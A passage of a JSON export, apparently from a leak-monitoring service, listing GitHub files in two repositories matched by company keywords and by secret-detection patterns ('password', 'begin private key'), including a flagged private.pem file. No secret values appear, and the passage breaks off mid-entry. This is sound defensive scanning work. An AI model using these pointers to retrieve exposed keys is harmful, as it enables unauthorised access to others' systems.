"severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "03d3943d397c38da04e243bb254ad1816c48b82f", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OSConfig/QueueManager/QueueManager_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + 
"authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OSConfig/QueueManager/QueueManager_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "321f4ee9985a4cbe47b6f5d726b2038619892635", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OSConfig/QueueManager/QueueManager_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OSConfig/QueueManager/QueueManager_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "6a03fda2495554a0d469dba2597b804a3cc9eb3a", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OSConfig/SystemControlManager/SystemControlManager_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": 
"example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OSConfig/SystemControlManager/SystemControlManager_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "eabe4eeaf27e013ab8f8bf55d00d3ce2b22a6050", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OSConfig/SystemControlManager/SystemControlManager_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OSConfig/SystemControlManager/SystemControlManager_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "5dee459468203f7f64a3f51530f815efefa32ce2", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OSConfig/SystemControlManager/SystemControlManager_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": 
"355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OSConfig/SystemControlManager/SystemControlManager_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "f8ea3160bba241d069f2b75b9cadf771c470422e", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OSConfig/TaskManager/TaskManager_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OSConfig/TaskManager/TaskManager_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "a6884161524d8816a8c0e63b1fa2801002670067", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OSConfig/TaskManager/TaskManager_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": 
"355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OSConfig/TaskManager/TaskManager_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "f132712729ac8da9e0856099142918addee0403a", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OSConfig/TaskManager/TaskManager_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OSConfig/TaskManager/TaskManager_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "c374b2a1dadea76a3c8ab1943e3e51bd399ff07d", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ProtocolsConfig/DALIMessageHandler/DALIMessageHandler_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": 
"355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ProtocolsConfig/DALIMessageHandler/DALIMessageHandler_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "da1448fad155214bd78242f813bffc16619fbf0f", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ProtocolsConfig/DALIMessageHandler/DALIMessageHandler_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ProtocolsConfig/DALIMessageHandler/DALIMessageHandler_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "a82b2a96e8b268d47f1d9c168e7da1a1c0fc266e", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ProtocolsConfig/DALIMessageHandler/DALIMessageHandler_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": 
"keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ProtocolsConfig/DALIMessageHandler/DALIMessageHandler_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "c9114f8944effde90b37025b139322b764240b1a", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Services/DebugManager/DebugManager.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Services/DebugManager/DebugManager.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "c3dff850813cec01ee2231ffa6a8c5ab777f452a", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Services/DebugManager/DebugManager.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + 
"data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Services/DebugManager/DebugManager.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "f01461df25f20aeb39768972c83204386379c990", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Services/ParameterManager/ParameterManager.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Services/ParameterManager/ParameterManager.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "6d44144be20f53cf85c849c1d3c13e9e2cda1038", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Services/StateExecutionEngine/StateExecutionEngine.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + 
"hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Services/StateExecutionEngine/StateExecutionEngine.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "2b4ca2c4d910c2edb54d45b5d2587d5953a11bb0", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Services/StateExecutionEngine/StateExecutionEngine.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Services/StateExecutionEngine/StateExecutionEngine.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "a562ff0bbe9883f032009c7b7848848761258e4f", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ServicesConfig/CommandHandlers/AsciiCommandHandler/AsciiCommandHandler_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + 
"type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ServicesConfig/CommandHandlers/AsciiCommandHandler/AsciiCommandHandler_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "340ef96ad17c275de5e3868fdd3d67a2aadd87be", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ServicesConfig/CommandHandlers/AsciiCommandHandler/AsciiCommandHandler_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ServicesConfig/CommandHandlers/AsciiCommandHandler/AsciiCommandHandler_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:40+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "091ebb041384788d677b3e6d864d8f8bce2cf7b8", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ServicesConfig/CommandHandlers/AsciiCommandHandler/AsciiCommandHandler_prm.h", + "revisions": [ + { + 
"bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ServicesConfig/CommandHandlers/AsciiCommandHandler/AsciiCommandHandler_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:40+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "b00fd9faa47a0e87f4c9f6b79a7d5955a9d45074", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ServicesConfig/DebugManager/DebugManager_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ServicesConfig/DebugManager/DebugManager_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:40+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "c2afd5748c47cf4242397e03d8d82c16db464028", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ServicesConfig/ManufInfo/ManufInfo_prm.h", + 
"revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ServicesConfig/ManufInfo/ManufInfo_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:40+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "e5dc3ab3034b5035c3892510c6e17292126414c5", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ServicesConfig/ParameterManager/ParameterManager_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ServicesConfig/ParameterManager/ParameterManager_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:40+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "5468e3536fa7b3f63c67c1f8ebe32cb062f35a0f", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": 
"Source/ServicesConfig/ParameterManager/ParameterManager_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ServicesConfig/ParameterManager/ParameterManager_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:40+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "8ab2b9622faff09a1621dafbb147ecf8ba501604", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ServicesConfig/ParameterManager/ParameterManager_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ServicesConfig/ParameterManager/ParameterManager_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:40+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "704ce46ed4918d3dfb434fb7411dd9c30741c1f6", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + 
"keyword": 1 + }, + "name": "Source/ServicesConfig/StateExecutionEngine/StateExecutionEngine_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ServicesConfig/StateExecutionEngine/StateExecutionEngine_prm.h" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "bbbd5900be4a011205fe2ec46f297edffce2a698", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "Source/Services/ParameterManager/ParameterManager.c", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": null, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Services/ParameterManager/ParameterManager.c" + } + ], + "id": "e129487e8490976801d5ba2623078387b2cfacb3", + "isFavourite": false, + "isHidden": false, + "isIgnore": false, + "matchesTypes": [], + "name": "https://github.com/example/DALILightEngine", + "numberOf": { + "contributors": 1, + "files": 93 + }, + "relations": { + "cyberintegration": "cyberintegration" + }, + "seqUpdate": 1728156880303511, + "source": "github" + }, + { + "contributors": [ + { + "authorEmail": 
"example@gmail.com", + "authorName": "example" + }, + { + "authorEmail": "example@gmail.com", + "authorName": "example" + }, + { + "authorEmail": "example@gmail.com", + "authorName": "example" + }, + { + "authorEmail": "example@gmail.com", + "authorName": "example" + }, + { + "authorEmail": "example@gmail.com", + "authorName": "example" + }, + { + "authorEmail": "example@gmail.com", + "authorName": "example" + }, + { + "authorEmail": "example@gmail.com", + "authorName": "example" + }, + { + "authorEmail": "example@gmail.com", + "authorName": "example" + }, + { + "authorEmail": "example@gmail.com", + "authorName": "example" + } + ], + "dataFound": { + "begin private key": 2, + "password": 6 + }, + "dateCreated": "2023-03-31T20:52:25+03:00", + "dateDetected": "2024-10-12T14:58:23+03:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "amber", + "ttl": 30 + }, + "files": [ + { + "dataFound": [], + "dateCreated": "2023-03-31T22:27:43+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "gray", + "tlp": "amber", + "ttl": 30 + }, + "id": "41dba7b42f66eb72e3a2258cfeb068e7e9b6428c", + "matchesType": [ + "readme" + ], + "matchesTypeCount": { + "readme": 1 + }, + "name": "README.md", + "revisions": [ + { + "bind": [ + { + "bindBy": "", + "companyId": 0, + "data": "", + "ruleId": 0, + "type": "readme" + } + ], + "data": null, + "hash": "e5ed9c96940166a0f1a0f2d8c538bb0587e02bd7", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1686423433 + } + } + ], + "rules": null, + "url": "https://github.com/bartlomiejkrawczyk/PAINT-23L/blob/master/README.md" + }, + { + "dataFound": [], + "dateCreated": "2023-06-04T11:32:06+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": 
"red", + "tlp": "amber", + "ttl": 30 + }, + "id": "8921da431bbc562961a131ab5958c1324caa906d", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "DATABASE/data/pl/5.txt", + "revisions": [ + { + "bind": [ + { + "bindBy": "pytia", + "companyId": 4189, + "data": "pytia", + "ruleId": 455991, + "type": "keyword" + } + ], + "data": null, + "hash": "6e75ac76542184f03b48d6ce9208913529a8d1e1", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1685867526 + } + } + ], + "rules": { + "pytia": "pytia" + }, + "url": "https://github.com/bartlomiejkrawczyk/PAINT-23L/tree/master/DATABASE/data/pl/5.txt" + }, + { + "dataFound": [ + "begin private key" + ], + "dateCreated": "2023-05-23T01:00:40+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "9e2cd18c6ec790fd72d13b68ed3880a8480845cc", + "matchesType": [ + "ssh" + ], + "matchesTypeCount": { + "ssh": 1 + }, + "name": "AUTHORIZATION/src/main/resources/private.pem", + "revisions": [ + { + "bind": [], + "data": { + "ssh": { + "ssh": [ + "begin private key" + ] + } + }, + "hash": "1073384abb81cdbb0ea5a3be3ef1dba7bc4444b4", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1684792840 + } + } + ], + "rules": null, + "url": "https://github.com/bartlomiejkrawczyk/PAINT-23L/tree/master/AUTHORIZATION/src/main/resources/private.pem" + }, + { + "dataFound": [ + "begin private key" + ], + "dateCreated": "2023-05-21T15:09:55+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "7f03a2f14de1e70769b1f86e15cd7425514ccb66", + "matchesType": [ + "ssh" + ], + "matchesTypeCount": { + "ssh": 1 + }, + "name": 
